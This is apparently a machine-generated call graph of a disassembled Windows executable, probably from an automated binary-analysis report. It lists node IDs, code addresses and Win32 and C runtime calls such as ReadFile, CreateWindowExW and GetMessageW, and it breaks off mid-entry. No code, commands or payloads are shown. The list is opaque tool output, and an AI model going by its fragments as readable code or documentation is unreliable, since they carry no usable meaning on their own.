84857->84860 84858->84857 84859 40202d 84858->84859 84861 4114ab __wcsicoll 58 API calls 84859->84861 84862 428b33 84860->84862 84863 402038 84861->84863 84865 428b3b GetModuleFileNameW 84862->84865 84864 402043 84863->84864 84863->84865 84866 4114ab __wcsicoll 58 API calls 84864->84866 84867 401a10 52 API calls 84865->84867 84868 40204e 84866->84868 84869 428b6c 84867->84869 84870 402092 84868->84870 84873 428b90 _wcscpy 84868->84873 84876 401a10 52 API calls 84868->84876 84871 40e0a0 52 API calls 84869->84871 84872 4020a3 84870->84872 84870->84873 84874 428b7a 84871->84874 84875 428bc6 84872->84875 85080 40e830 53 API calls 84872->85080 84881 401a10 52 API calls 84873->84881 84877 401a10 52 API calls 84874->84877 84879 402073 _wcscpy 84876->84879 84880 428b88 84877->84880 84884 401a10 52 API calls 84879->84884 84880->84873 84889 4020d0 84881->84889 84882 4020bb 85081 40cf00 53 API calls 84882->85081 84884->84870 84885 4020c6 84886 408f40 VariantClear 84885->84886 84886->84889 84887 402110 84891 408f40 VariantClear 84887->84891 84889->84887 84892 401a10 52 API calls 84889->84892 85082 40cf00 53 API calls 84889->85082 85083 40e6a0 53 API calls 84889->85083 84893 402120 ctype 84891->84893 84892->84889 84893->84738 84895 4295c9 __recalloc 84894->84895 84896 40f53c 84894->84896 84899 4295d9 GetOpenFileNameW 84895->84899 85759 410120 84896->85759 84898 40f545 85763 4102b0 SHGetMalloc 84898->85763 84899->84896 84901 40d5f5 84899->84901 84901->84746 84901->84748 84902 40f54c 85768 410190 GetFullPathNameW 84902->85768 84904 40f559 85779 40f570 84904->85779 85841 402400 84906->85841 84908 40146f 84909 428c29 _wcscat 84908->84909 85850 401500 84908->85850 84911 40147c 84911->84909 85858 40d440 84911->85858 84913 401489 84913->84909 84914 401491 GetFullPathNameW 84913->84914 84915 402160 52 API calls 84914->84915 84916 4014bb 84915->84916 84917 402160 52 API calls 84916->84917 84918 4014c8 84917->84918 84918->84909 84919 402160 52 API calls 84918->84919 84920 4014ee 84919->84920 84920->84748 84922 428361 84921->84922 84923 4103fc LoadImageW RegisterClassExW 84921->84923 85878 44395e EnumResourceNamesW LoadImageW 84922->85878 85877 410490 7 API calls 84923->85877 84926 40d651 84928 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 84926->84928 84927 428368 84928->84760 84930 409202 84929->84930 84931 42d7ad 84929->84931 84989 409216 ctype 84930->84989 86141 410940 331 API calls 84930->86141 86144 45e737 90 API calls 3 library calls 84931->86144 84934 409386 84935 40939c 84934->84935 86142 40f190 10 API calls 84934->86142 84935->84761 84995 401000 Shell_NotifyIconW __recalloc 84935->84995 84937 4095b2 84937->84935 84939 4095bf 84937->84939 84938 409253 PeekMessageW 84938->84989 86143 401a50 331 API calls 84939->86143 84941 40d410 VariantClear 84941->84989 84942 42d8cd Sleep 84942->84989 84943 4095c6 LockWindowUpdate DestroyWindow GetMessageW 84943->84935 84946 4095f9 84943->84946 84945 42e13b 86162 40d410 VariantClear 84945->86162 84949 42e158 TranslateMessage DispatchMessageW GetMessageW 84946->84949 84949->84949 84951 42e188 84949->84951 84950 409567 PeekMessageW 84950->84989 84951->84935 84954 46fdbf 108 API calls 84990 4094e0 84954->84990 84955 46f3c1 107 API calls 84955->84989 84956 40e0a0 52 API calls 84956->84989 84957 409551 TranslateMessage DispatchMessageW 84957->84950 84959 42dcd2 WaitForSingleObject 84960 42dcf0 GetExitCodeProcess CloseHandle 84959->84960 84959->84989 86151 40d410 VariantClear 84960->86151 84962 44c29d 52 API calls 84962->84990 84963 42dd3d Sleep 84963->84990 84965 4094cf Sleep 84965->84990 84968 42d94d timeGetTime 86147 465124 53 API calls 84968->86147 84970 40c620 timeGetTime 84970->84990 84973 465124 53 API calls 84973->84990 84974 42dd89 CloseHandle 84974->84990 84975 47d33e 309 API calls 84975->84989 84977 42de19 GetExitCodeProcess CloseHandle 84977->84990 84979 401b10 52 API calls 84979->84990 84981 42de88 Sleep 84981->84989 84984 401980 53 API calls 84984->84990 84985 45e737 90 API calls 84985->84989 84988 42e0cc VariantClear 84988->84989 84989->84934 84989->84938 84989->84941 84989->84942 84989->84945 84989->84950 84989->84955 84989->84956 84989->84957 84989->84959 84989->84963 84989->84965 84989->84968 84989->84975 84989->84985 84989->84988 84989->84990 84991 408f40 VariantClear 84989->84991 85879 4091b0 84989->85879 85937 40afa0 84989->85937 85963 408fc0 84989->85963 85998 408cc0 84989->85998 86012 4096a0 84989->86012 86139 40d150 TranslateAcceleratorW 84989->86139 86140 40d170 IsDialogMessageW GetClassLongW 84989->86140 86145 465124 53 API calls 84989->86145 86146 40c620 timeGetTime 84989->86146 86161 40e270 VariantClear ctype 84989->86161 84990->84954 84990->84962 84990->84970 84990->84973 84990->84974 84990->84977 84990->84979 84990->84981 84990->84984 84990->84989 84994 408f40 VariantClear 84990->84994 86148 45178a 54 API calls 84990->86148 86149 47d33e 331 API calls 84990->86149 86150 453bc6 54 API calls 84990->86150 86152 40d410 VariantClear 84990->86152 86153 443d19 67 API calls _wcslen 84990->86153 86154 4574b4 VariantClear 84990->86154 86155 403cd0 84990->86155 86159 4731e1 VariantClear 84990->86159 86160 4331a2 6 API calls 84990->86160 84991->84989 84994->84990 84995->84761 84996->84748 84997->84754 84999 401b16 _wcslen 84998->84999 85000 4115d7 52 API calls 84999->85000 85002 401b63 84999->85002 85001 401b4b _memmove 85000->85001 85003 4115d7 52 API calls 85001->85003 85004 40d200 52 API calls 2 library calls 85002->85004 85003->85002 85004->84770 85005->84773 85007 40bc70 52 API calls 85006->85007 85008 401f31 85007->85008 85009 402560 85008->85009 85010 40256d __write_nolock 85009->85010 85011 402160 52 API calls 85010->85011 85013 402593 85011->85013 85023 4025bd 85013->85023 85084 401c90 85013->85084 85014 4026f0 52 API calls 85014->85023 85015 4026a7 85016 401b10 52 API calls 85015->85016 85022 4026db 85015->85022 85018 4026d1 85016->85018 85017 401b10 52 API calls 85017->85023 85088 40d7c0 52 API calls 2 library calls 85018->85088 85019 401c90 52 API calls 85019->85023 85022->84828 85023->85014 85023->85015 85023->85017 85023->85019 85087 40d7c0 52 API calls 2 library calls 85023->85087 85089 40f760 85024->85089 85027 410118 85027->84830 85029 42805d 85030 42806a 85029->85030 85145 431e58 85029->85145 85032 413748 _free 46 API calls 85030->85032 85033 428078 85032->85033 85034 431e58 82 API calls 85033->85034 85035 428084 85034->85035 85035->84830 85037 4115d7 52 API calls 85036->85037 85038 401f74 85037->85038 85038->84833 85040 4019a3 85039->85040 85046 401985 85039->85046 85041 4019b8 85040->85041 85040->85046 85748 403e10 53 API calls 85041->85748 85043 40199f 85043->84836 85045 4019c4 85045->84836 85046->85043 85747 403e10 53 API calls 85046->85747 85048 40c2c7 85047->85048 85049 40c30e 85047->85049 85052 40c2d3 85048->85052 85053 426c79 85048->85053 85050 40c315 85049->85050 85051 426c2b 85049->85051 85057 40c321 85050->85057 85058 426c5a 85050->85058 85055 426c4b 85051->85055 85056 426c2e 85051->85056 85749 403ea0 52 API calls __cinit 85052->85749 85754 4534e3 52 API calls 85053->85754 85752 4534e3 52 API calls 85055->85752 85063 40c2de 85056->85063 85751 4534e3 52 API calls 85056->85751 85750 403ea0 52 API calls __cinit 85057->85750 85753 4534e3 52 API calls 85058->85753 85063->84846 85066 401a30 85065->85066 85067 401a17 85065->85067 85068 402160 52 API calls 85066->85068 85069 401a2d 85067->85069 85755 403c30 52 API calls _memmove 85067->85755 85070 401a3d 85068->85070 85069->84850 85070->84850 85073 411523 85072->85073 85074 4114ba 85072->85074 85758 4113a8 58 API calls 3 library calls 85073->85758 85079 40200c 85074->85079 85756 417f77 46 API calls __getptd_noexit 85074->85756 85077 4114c6 85757 417f25 10 API calls __write_nolock 85077->85757 85079->84853 85079->84854 85080->84882 85081->84885 85082->84889 85083->84889 85085 4026f0 52 API calls 85084->85085 85086 401c97 85085->85086 85086->85013 85087->85023 85088->85022 85149 40f6f0 85089->85149 85091 40f77b _strcat ctype 85157 40f850 85091->85157 85096 427c2a 85186 414d04 85096->85186 85098 40f7fc 85098->85096 85099 40f804 85098->85099 85173 414a46 85099->85173 85104 40f80e 85104->85027 85108 4528bd 85104->85108 85105 427c59 85192 414fe2 85105->85192 85107 427c79 85109 4150d1 _fseek 81 API calls 85108->85109 85110 452930 85109->85110 85689 452719 85110->85689 85113 452948 85113->85029 85114 414d04 __fread_nolock 61 API calls 85115 452966 85114->85115 85116 414d04 __fread_nolock 61 API calls 85115->85116 85117 452976 85116->85117 85118 414d04 __fread_nolock 61 API calls 85117->85118 85119 45298f 85118->85119 85120 414d04 __fread_nolock 61 API calls 85119->85120 85121 4529aa 85120->85121 85122 4150d1 _fseek 81 API calls 85121->85122 85123 4529c4 85122->85123 85124 4135bb _malloc 46 API calls 85123->85124 85125 4529cf 85124->85125 85126 4135bb _malloc 46 API calls 85125->85126 85127 4529db 85126->85127 85128 414d04 __fread_nolock 61 API calls 85127->85128 85129 4529ec 85128->85129 85130 44afef GetSystemTimeAsFileTime 85129->85130 85131 452a00 85130->85131 85132 452a36 85131->85132 85133 452a13 85131->85133 85134 452aa5 85132->85134 85135 452a3c 85132->85135 85136 413748 _free 46 API calls 85133->85136 85138 413748 _free 46 API calls 85134->85138 85695 44b1a9 85135->85695 85139 452a1c 85136->85139 85141 452aa3 85138->85141 85142 413748 _free 46 API calls 85139->85142 85140 452a9d 85144 413748 _free 46 API calls 85140->85144 85141->85029 85143 452a25 85142->85143 85143->85029 85144->85141 85146 431e64 85145->85146 85147 431e6a 85145->85147 85148 414a46 __fcloseall 82 API calls 85146->85148 85147->85030 85148->85147 85150 425de2 85149->85150 85152 40f6fc _wcslen 85149->85152 85150->85091 85151 40f710 WideCharToMultiByte 85153 40f756 85151->85153 85154 40f728 85151->85154 85152->85151 85153->85091 85155 4115d7 52 API calls 85154->85155 85156 40f735 WideCharToMultiByte 85155->85156 85156->85091 85159 40f85d __recalloc _strlen 85157->85159 85160 40f7ab 85159->85160 85205 414db8 85159->85205 85161 4149c2 85160->85161 85217 414904 85161->85217 85163 40f7e9 85163->85096 85164 40f5c0 85163->85164 85168 40f5cd _strcat __write_nolock _memmove 85164->85168 85165 414d04 __fread_nolock 61 API calls 85165->85168 85167 425d11 85169 4150d1 _fseek 81 API calls 85167->85169 85168->85165 85168->85167 85172 40f691 __tzset_nolock 85168->85172 85305 4150d1 85168->85305 85170 425d33 85169->85170 85171 414d04 __fread_nolock 61 API calls 85170->85171 85171->85172 85172->85098 85174 414a52 _fprintf 85173->85174 85175 414a64 85174->85175 85176 414a79 85174->85176 85445 417f77 46 API calls __getptd_noexit 85175->85445 85178 415471 __lock_file 47 API calls 85176->85178 85182 414a74 _fprintf 85176->85182 85180 414a92 85178->85180 85179 414a69 85446 417f25 10 API calls __write_nolock 85179->85446 85429 4149d9 85180->85429 85182->85104 85514 414c76 85186->85514 85188 414d1c 85189 44afef 85188->85189 85682 442c5a 85189->85682 85191 44b00d 85191->85105 85193 414fee _fprintf 85192->85193 85194 414ffa 85193->85194 85195 41500f 85193->85195 85686 417f77 46 API calls __getptd_noexit 85194->85686 85197 415471 __lock_file 47 API calls 85195->85197 85199 415017 85197->85199 85198 414fff 85687 417f25 10 API calls __write_nolock 85198->85687 85201 414e4e __ftell_nolock 51 API calls 85199->85201 85202 415024 85201->85202 85688 41503d LeaveCriticalSection LeaveCriticalSection _fseek 85202->85688 85204 41500a _fprintf 85204->85107 85206 414dd6 85205->85206 85207 414deb 85205->85207 85214 417f77 46 API calls __getptd_noexit 85206->85214 85207->85206 85210 414df2 85207->85210 85209 414ddb 85215 417f25 10 API calls __write_nolock 85209->85215 85212 414de6 85210->85212 85216 418f98 77 API calls 6 library calls 85210->85216 85212->85159 85214->85209 85215->85212 85216->85212 85218 414910 _fprintf 85217->85218 85219 414923 85218->85219 85222 414951 85218->85222 85273 417f77 46 API calls __getptd_noexit 85219->85273 85221 414928 85274 417f25 10 API calls __write_nolock 85221->85274 85236 41d4d1 85222->85236 85225 414956 85226 41496a 85225->85226 85227 41495d 85225->85227 85228 414992 85226->85228 85229 414972 85226->85229 85275 417f77 46 API calls __getptd_noexit 85227->85275 85253 41d218 85228->85253 85276 417f77 46 API calls __getptd_noexit 85229->85276 85233 414933 @_EH4_CallFilterFunc@8 _fprintf 85233->85163 85237 41d4dd _fprintf 85236->85237 85238 4182cb __lock 46 API calls 85237->85238 85250 41d4eb 85238->85250 85239 41d560 85278 41d5fb 85239->85278 85240 41d567 85242 416b04 __malloc_crt 46 API calls 85240->85242 85244 41d56e 85242->85244 85243 41d5f0 _fprintf 85243->85225 85244->85239 85245 41d57c InitializeCriticalSectionAndSpinCount 85244->85245 85248 41d59c 85245->85248 85249 41d5af EnterCriticalSection 85245->85249 85246 418209 __mtinitlocknum 46 API calls 85246->85250 85251 413748 _free 46 API calls 85248->85251 85249->85239 85250->85239 85250->85240 85250->85246 85281 4154b2 47 API calls __lock 85250->85281 85282 415520 LeaveCriticalSection LeaveCriticalSection _doexit 85250->85282 85251->85239 85254 41d23a 85253->85254 85255 41d255 85254->85255 85266 41d26c __wopenfile 85254->85266 85287 417f77 46 API calls __getptd_noexit 85255->85287 85257 41d25a 85288 417f25 10 API calls __write_nolock 85257->85288 85258 41d47a 85292 417f77 46 API calls __getptd_noexit 85258->85292 85259 41d48c 85284 422bf9 85259->85284 85263 41d47f 85293 417f25 10 API calls __write_nolock 85263->85293 85264 41499d 85277 4149b8 LeaveCriticalSection LeaveCriticalSection _fseek 85264->85277 85266->85258 85272 41d421 85266->85272 85289 41341f 58 API calls 2 library calls 85266->85289 85268 41d41a 85268->85272 85290 41341f 58 API calls 2 library calls 85268->85290 85270 41d439 85270->85272 85291 41341f 58 API calls 2 library calls 85270->85291 85272->85258 85272->85259 85273->85221 85274->85233 85275->85233 85276->85233 85277->85233 85283 4181f2 LeaveCriticalSection 85278->85283 85280 41d602 85280->85243 85281->85250 85282->85250 85283->85280 85294 422b35 85284->85294 85286 422c14 85286->85264 85287->85257 85288->85264 85289->85268 85290->85270 85291->85272 85292->85263 85293->85264 85295 422b41 _fprintf 85294->85295 85296 422b54 85295->85296 85299 422b8a 85295->85299 85297 417f77 __write_nolock 46 API calls 85296->85297 85298 422b59 85297->85298 85300 417f25 __write_nolock 10 API calls 85298->85300 85301 422400 __tsopen_nolock 109 API calls 85299->85301 85304 422b63 _fprintf 85300->85304 85302 422ba4 85301->85302 85303 422bcb __wsopen_helper LeaveCriticalSection 85302->85303 85303->85304 85304->85286 85308 4150dd _fprintf 85305->85308 85306 4150e9 85336 417f77 46 API calls __getptd_noexit 85306->85336 85308->85306 85309 41510f 85308->85309 85318 415471 85309->85318 85310 4150ee 85337 417f25 10 API calls __write_nolock 85310->85337 85317 4150f9 _fprintf 85317->85168 85319 415483 85318->85319 85320 4154a5 EnterCriticalSection 85318->85320 85319->85320 85322 41548b 85319->85322 85321 415117 85320->85321 85324 415047 85321->85324 85323 4182cb __lock 46 API calls 85322->85323 85323->85321 85325 415067 85324->85325 85326 415057 85324->85326 85331 415079 85325->85331 85339 414e4e 85325->85339 85394 417f77 46 API calls __getptd_noexit 85326->85394 85330 41505c 85338 415143 LeaveCriticalSection LeaveCriticalSection _fseek 85330->85338 85356 41443c 85331->85356 85334 4150b9 85369 41e1f4 85334->85369 85336->85310 85337->85317 85338->85317 85340 414e61 85339->85340 85341 414e79 85339->85341 85395 417f77 46 API calls __getptd_noexit 85340->85395 85343 414139 __fseek_nolock 46 API calls 85341->85343 85345 414e80 85343->85345 85344 414e66 85396 417f25 10 API calls __write_nolock 85344->85396 85347 41e1f4 __write 51 API calls 85345->85347 85348 414e97 85347->85348 85349 414ec9 85348->85349 85350 414f09 85348->85350 85355 414e71 85348->85355 85352 41e1f4 __write 51 API calls 85349->85352 85349->85355 85397 417f77 46 API calls __getptd_noexit 85350->85397 85353 414f64 85352->85353 85354 41e1f4 __write 51 API calls 85353->85354 85353->85355 85354->85355 85355->85331 85357 414455 85356->85357 85361 414477 85356->85361 85358 414139 __fseek_nolock 46 API calls 85357->85358 85357->85361 85359 414470 85358->85359 85398 41b7b2 77 API calls 4 library calls 85359->85398 85362 414139 85361->85362 85363 414145 85362->85363 85364 41415a 85362->85364 85399 417f77 46 API calls __getptd_noexit 85363->85399 85364->85334 85366 41414a 85400 417f25 10 API calls __write_nolock 85366->85400 85368 414155 85368->85334 85370 41e200 _fprintf 85369->85370 85371 41e223 85370->85371 85372 41e208 85370->85372 85374 41e22f 85371->85374 85377 41e269 85371->85377 85421 417f8a 46 API calls __getptd_noexit 85372->85421 85423 417f8a 46 API calls __getptd_noexit 85374->85423 85375 41e20d 85422 417f77 46 API calls __getptd_noexit 85375->85422 85401 41ae56 85377->85401 85379 41e234 85424 417f77 46 API calls __getptd_noexit 85379->85424 85382 41e26f 85384 41e291 85382->85384 85385 41e27d 85382->85385 85383 41e23c 85425 417f25 10 API calls __write_nolock 85383->85425 85426 417f77 46 API calls __getptd_noexit 85384->85426 85411 41e17f 85385->85411 85387 41e215 _fprintf 85387->85330 85390 41e289 85428 41e2c0 LeaveCriticalSection __unlock_fhandle 85390->85428 85391 41e296 85427 417f8a 46 API calls __getptd_noexit 85391->85427 85394->85330 85395->85344 85396->85355 85397->85355 85398->85361 85399->85366 85400->85368 85402 41ae62 _fprintf 85401->85402 85403 41aebc 85402->85403 85404 4182cb __lock 46 API calls 85402->85404 85405 41aec1 EnterCriticalSection 85403->85405 85406 41aede _fprintf 85403->85406 85407 41ae8e 85404->85407 85405->85406 85406->85382 85408 41aeaa 85407->85408 85409 41ae97 InitializeCriticalSectionAndSpinCount 85407->85409 85410 41aeec ___lock_fhandle LeaveCriticalSection 85408->85410 85409->85408 85410->85403 85412 41aded __lseek_nolock 46 API calls 85411->85412 85413 41e18e 85412->85413 85414 41e1a4 SetFilePointer 85413->85414 85415 41e194 85413->85415 85417 41e1bb GetLastError 85414->85417 85419 41e1c3 85414->85419 85416 417f77 __write_nolock 46 API calls 85415->85416 85418 41e199 85416->85418 85417->85419 85418->85390 85419->85418 85420 417f9d __dosmaperr 46 API calls 85419->85420 85420->85418 85421->85375 85422->85387 85423->85379 85424->85383 85425->85387 85426->85391 85427->85390 85428->85387 85430 4149ea 85429->85430 85431 4149fe 85429->85431 85475 417f77 46 API calls __getptd_noexit 85430->85475 85434 41443c __flush 77 API calls 85431->85434 85443 4149fa 85431->85443 85433 4149ef 85476 417f25 10 API calls __write_nolock 85433->85476 85435 414a0a 85434->85435 85448 41d8c2 85435->85448 85439 414139 __fseek_nolock 46 API calls 85440 414a18 85439->85440 85452 41d7fe 85440->85452 85442 414a1e 85442->85443 85444 413748 _free 46 API calls 85442->85444 85447 414ab2 LeaveCriticalSection LeaveCriticalSection _fseek 85443->85447 85444->85443 85445->85179 85446->85182 85447->85182 85449 414a12 85448->85449 85450 41d8d2 85448->85450 85449->85439 85450->85449 85451 413748 _free 46 API calls 85450->85451 85451->85449 85453 41d80a _fprintf 85452->85453 85454 41d812 85453->85454 85455 41d82d 85453->85455 85492 417f8a 46 API calls __getptd_noexit 85454->85492 85456 41d839 85455->85456 85461 41d873 85455->85461 85494 417f8a 46 API calls __getptd_noexit 85456->85494 85459 41d817 85493 417f77 46 API calls __getptd_noexit 85459->85493 85460 41d83e 85495 417f77 46 API calls __getptd_noexit 85460->85495 85464 41ae56 ___lock_fhandle 48 API calls 85461->85464 85466 41d879 85464->85466 85465 41d846 85496 417f25 10 API calls __write_nolock 85465->85496 85468 41d893 85466->85468 85469 41d887 85466->85469 85497 417f77 46 API calls __getptd_noexit 85468->85497 85477 41d762 85469->85477 85471 41d81f _fprintf 85471->85442 85473 41d88d 85498 41d8ba LeaveCriticalSection __unlock_fhandle 85473->85498 85475->85433 85476->85443 85499 41aded 85477->85499 85479 41d7c8 85512 41ad67 47 API calls __write_nolock 85479->85512 85480 41d772 85480->85479 85481 41d7a6 85480->85481 85483 41aded __lseek_nolock 46 API calls 85480->85483 85481->85479 85484 41aded __lseek_nolock 46 API calls 85481->85484 85486 41d79d 85483->85486 85487 41d7b2 CloseHandle 85484->85487 85485 41d7d0 85488 41d7f2 85485->85488 85513 417f9d 46 API calls 2 library calls 85485->85513 85489 41aded __lseek_nolock 46 API calls 85486->85489 85487->85479 85490 41d7be GetLastError 85487->85490 85488->85473 85489->85481 85490->85479 85492->85459 85493->85471 85494->85460 85495->85465 85496->85471 85497->85473 85498->85471 85500 41adfa 85499->85500 85501 41ae12 85499->85501 85502 417f8a __write_nolock 46 API calls 85500->85502 85504 417f8a __write_nolock 46 API calls 85501->85504 85507 41ae51 85501->85507 85503 41adff 85502->85503 85505 417f77 __write_nolock 46 API calls 85503->85505 85506 41ae23 85504->85506 85508 41ae07 85505->85508 85509 417f77 __write_nolock 46 API calls 85506->85509 85507->85480 85508->85480 85510 41ae2b 85509->85510 85511 417f25 __write_nolock 10 API calls 85510->85511 85511->85508 85512->85485 85513->85488 85515 414c82 _fprintf 85514->85515 85516 414cc3 85515->85516 85517 414c96 __recalloc 85515->85517 85518 414cbb _fprintf 85515->85518 85519 415471 __lock_file 47 API calls 85516->85519 85541 417f77 46 API calls __getptd_noexit 85517->85541 85518->85188 85521 414ccb 85519->85521 85527 414aba 85521->85527 85522 414cb0 85542 417f25 10 API calls __write_nolock 85522->85542 85531 414ad8 __recalloc 85527->85531 85534 414af2 85527->85534 85528 414ae2 85594 417f77 46 API calls __getptd_noexit 85528->85594 85530 414ae7 85595 417f25 10 API calls __write_nolock 85530->85595 85531->85528 85531->85534 85538 414b2d 85531->85538 85543 414cfa LeaveCriticalSection LeaveCriticalSection _fseek 85534->85543 85535 414c38 __recalloc 85597 417f77 46 API calls __getptd_noexit 85535->85597 85536 414139 __fseek_nolock 46 API calls 85536->85538 85538->85534 85538->85535 85538->85536 85544 41dfcc 85538->85544 85574 41d8f3 85538->85574 85596 41e0c2 46 API calls 3 library calls 85538->85596 85541->85522 85542->85518 85543->85518 85545 41dfd8 _fprintf 85544->85545 85546 41dfe0 85545->85546 85547 41dffb 85545->85547 85667 417f8a 46 API calls __getptd_noexit 85546->85667 85549 41e007 85547->85549 85552 41e041 85547->85552 85669 417f8a 46 API calls __getptd_noexit 85549->85669 85550 41dfe5 85668 417f77 46 API calls __getptd_noexit 85550->85668 85555 41e063 85552->85555 85556 41e04e 85552->85556 85554 41e00c 85670 417f77 46 API calls __getptd_noexit 85554->85670 85559 41ae56 ___lock_fhandle 48 API calls 85555->85559 85672 417f8a 46 API calls __getptd_noexit 85556->85672 85561 41e069 85559->85561 85560 41e053 85673 417f77 46 API calls __getptd_noexit 85560->85673 85564 41e077 85561->85564 85565 41e08b 85561->85565 85562 41e014 85671 417f25 10 API calls __write_nolock 85562->85671 85598 41da15 85564->85598 85674 417f77 46 API calls __getptd_noexit 85565->85674 85569 41dfed _fprintf 85569->85538 85570 41e083 85676 41e0ba LeaveCriticalSection __unlock_fhandle 85570->85676 85571 41e090 85675 417f8a 46 API calls __getptd_noexit 85571->85675 85575 41d900 85574->85575 85578 41d915 85574->85578 85680 417f77 46 API calls __getptd_noexit 85575->85680 85577 41d905 85681 417f25 10 API calls __write_nolock 85577->85681 85580 41d94a 85578->85580 85585 41d910 85578->85585 85677 420603 85578->85677 85582 414139 __fseek_nolock 46 API calls 85580->85582 85583 41d95e 85582->85583 85584 41dfcc __read 59 API calls 85583->85584 85586 41d965 85584->85586 85585->85538 85586->85585 85587 414139 __fseek_nolock 46 API calls 85586->85587 85588 41d988 85587->85588 85588->85585 85589 414139 __fseek_nolock 46 API calls 85588->85589 85590 41d994 85589->85590 85590->85585 85591 414139 __fseek_nolock 46 API calls 85590->85591 85592 41d9a1 85591->85592 85593 414139 __fseek_nolock 46 API calls 85592->85593 85593->85585 85594->85530 85595->85534 85596->85538 85597->85530 85599 41da31 85598->85599 85600 41da4c 85598->85600 85602 417f8a __write_nolock 46 API calls 85599->85602 85601 41da5b 85600->85601 85603 41da7a 85600->85603 85604 417f8a __write_nolock 46 API calls 85601->85604 85605 41da36 85602->85605 85607 41da98 85603->85607 85618 41daac 85603->85618 85606 41da60 85604->85606 85608 417f77 __write_nolock 46 API calls 85605->85608 85609 417f77 __write_nolock 46 API calls 85606->85609 85610 417f8a __write_nolock 46 API calls 85607->85610 85619 41da3e 85608->85619 85612 41da67 85609->85612 85614 41da9d 85610->85614 85611 41db02 85613 417f8a __write_nolock 46 API calls 85611->85613 85615 417f25 __write_nolock 10 API calls 85612->85615 85616 41db07 85613->85616 85617 417f77 __write_nolock 46 API calls 85614->85617 85615->85619 85620 417f77 __write_nolock 46 API calls 85616->85620 85621 41daa4 85617->85621 85618->85611 85618->85619 85622 41dae1 85618->85622 85623 41db1b 85618->85623 85619->85570 85620->85621 85624 417f25 __write_nolock 10 API calls 85621->85624 85622->85611 85627 41daec ReadFile 85622->85627 85625 416b04 __malloc_crt 46 API calls 85623->85625 85624->85619 85628 41db31 85625->85628 85629 41dc17 85627->85629 85630 41df8f GetLastError 85627->85630 85633 41db59 85628->85633 85634 41db3b 85628->85634 85629->85630 85637 41dc2b 85629->85637 85631 41de16 85630->85631 85632 41df9c 85630->85632 85641 417f9d __dosmaperr 46 API calls 85631->85641 85647 41dd9b 85631->85647 85635 417f77 __write_nolock 46 API calls 85632->85635 85638 420494 __lseeki64_nolock 48 API calls 85633->85638 85636 417f77 __write_nolock 46 API calls 85634->85636 85639 41dfa1 85635->85639 85640 41db40 85636->85640 85646 41de5b 85637->85646 85637->85647 85648 41dc47 85637->85648 85642 41db67 85638->85642 85643 417f8a __write_nolock 46 API calls 85639->85643 85644 417f8a __write_nolock 46 API calls 85640->85644 85641->85647 85642->85627 85643->85647 85644->85619 85645 413748 _free 46 API calls 85645->85619 85646->85647 85650 41ded0 ReadFile 85646->85650 85647->85619 85647->85645 85649 41dcab ReadFile 85648->85649 85656 41dd28 85648->85656 85652 41dcc9 GetLastError 85649->85652 85658 41dcd3 85649->85658 85653 41deef GetLastError 85650->85653 85654 41def9 85650->85654 85651 41ddec MultiByteToWideChar 85651->85647 85655 41de10 GetLastError 85651->85655 85652->85648 85652->85658 85653->85646 85653->85654 85654->85646 85662 420494 __lseeki64_nolock 48 API calls 85654->85662 85655->85631 85656->85647 85657 41dd96 85656->85657 85660 41dda3 85656->85660 85663 41dd60 85656->85663 85659 417f77 __write_nolock 46 API calls 85657->85659 85658->85648 85661 420494 __lseeki64_nolock 48 API calls 85658->85661 85659->85647 85660->85663 85664 41ddda 85660->85664 85661->85658 85662->85654 85663->85651 85665 420494 __lseeki64_nolock 48 API calls 85664->85665 85666 41dde9 85665->85666 85666->85651 85667->85550 85668->85569 85669->85554 85670->85562 85671->85569 85672->85560 85673->85562 85674->85571 85675->85570 85676->85569 85678 416b04 __malloc_crt 46 API calls 85677->85678 85679 420618 85678->85679 85679->85580 85680->85577 85681->85585 85685 4148b3 GetSystemTimeAsFileTime __aulldiv 85682->85685 85684 442c6b 85684->85191 85685->85684 85686->85198 85687->85204 85688->85204 85694 45272f __tzset_nolock _wcscpy 85689->85694 85690 414d04 61 API calls __fread_nolock 85690->85694 85691 44afef GetSystemTimeAsFileTime 85691->85694 85692 4528a4 85692->85113 85692->85114 85693 4150d1 81 API calls _fseek 85693->85694 85694->85690 85694->85691 85694->85692 85694->85693 85696 44b1bc 85695->85696 85697 44b1ca 85695->85697 85698 4149c2 116 API calls 85696->85698 85699 44b1e1 85697->85699 85700 44b1d8 85697->85700 85701 4149c2 116 API calls 85697->85701 85698->85697 85730 4321a4 85699->85730 85700->85140 85703 44b2db 85701->85703 85703->85699 85705 44b2e9 85703->85705 85704 44b224 85706 44b253 85704->85706 85707 44b228 85704->85707 85708 44b2f6 85705->85708 85710 414a46 __fcloseall 82 API calls 85705->85710 85734 43213d 85706->85734 85709 44b235 85707->85709 85713 414a46 __fcloseall 82 API calls 85707->85713 85708->85140 85714 44b245 85709->85714 85717 414a46 __fcloseall 82 API calls 85709->85717 85710->85708 85712 44b25a 85715 44b260 85712->85715 85716 44b289 85712->85716 85713->85709 85714->85140 85719 414a46 __fcloseall 82 API calls 85715->85719 85721 44b26d 85715->85721 85744 44b0bf 87 API calls 85716->85744 85717->85714 85719->85721 85720 44b28f 85745 4320f8 46 API calls _free 85720->85745 85722 414a46 __fcloseall 82 API calls 85721->85722 85724 44b27d 85721->85724 85722->85724 85724->85140 85725 44b295 85726 44b2a2 85725->85726 85727 414a46 __fcloseall 82 API calls 85725->85727 85728 44b2b2 85726->85728 85729 414a46 __fcloseall 82 API calls 85726->85729 85727->85726 85728->85140 85729->85728 85731 4321cb 85730->85731 85733 4321b4 __tzset_nolock _memmove 85730->85733 85732 414d04 __fread_nolock 61 API calls 85731->85732 85732->85733 85733->85704 85735 4135bb _malloc 46 API calls 85734->85735 85736 432150 85735->85736 85737 4135bb _malloc 46 API calls 85736->85737 85738 432162 85737->85738 85739 4135bb _malloc 46 API calls 85738->85739 85740 432174 85739->85740 85742 432189 85740->85742 85746 4320f8 46 API calls _free 85740->85746 85742->85712 85743 432198 85743->85712 85744->85720 85745->85725 85746->85743 85747->85043 85748->85045 85749->85063 85750->85063 85751->85063 85752->85058 85753->85063 85754->85063 85755->85069 85756->85077 85757->85079 85758->85079 85808 410160 85759->85808 85761 41012f GetFullPathNameW 85762 410147 ctype 85761->85762 85762->84898 85764 4102cb SHGetDesktopFolder 85763->85764 85767 410333 _wcsncpy 85763->85767 85765 4102e0 _wcsncpy 85764->85765 85764->85767 85766 41031c SHGetPathFromIDListW 85765->85766 85765->85767 85766->85767 85767->84902 85769 4101bb 85768->85769 85771 425f4a 85768->85771 85770 410160 52 API calls 85769->85770 85772 4101c7 85770->85772 85773 4114ab __wcsicoll 58 API calls 85771->85773 85776 